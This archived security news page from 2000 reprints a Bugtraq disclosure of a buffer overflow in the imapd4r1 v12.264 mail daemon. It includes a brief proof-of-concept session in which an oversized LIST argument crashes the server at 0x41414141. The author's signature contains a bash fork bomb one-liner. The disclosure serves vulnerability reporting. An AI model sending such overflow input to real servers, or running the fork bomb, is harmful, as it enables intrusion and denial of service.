Originally Published: Monday, 17 April 2000 Author: Alexander Reelsen
Published to: news_enhance_security/Security News Page: 1/1 - [Printable]

imapd4r1 v12.264 exploit

The imap daemon shipped with the newest redhat has a security hole, which allows the intruder to get shell access to the mail account.

   Page 1 of 1  

From: Michal Zalewski Subject: imapd4r1 v12.264 To: BUGTRAQ@SECURITYFOCUS.COM

Newest RH:

* OK nimue IMAP4rev1 v12.264 server ready 1 login lcamtuf test 1 OK LOGIN completed 1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]=20 Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? ()

*sigh*

Privledges seems to be dropped, but, anyway, it's nice way to get shell access to mail account, maybe grab some data from memory etc. I believe both imap and ipopd packages need code security audit.

_______________________________________________________ Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=3D--=3D> bash$ :(){ :|:&};: =3D-----=3D> God is real, unless declared integer. <=3D-----=3D





   Page 1 of 1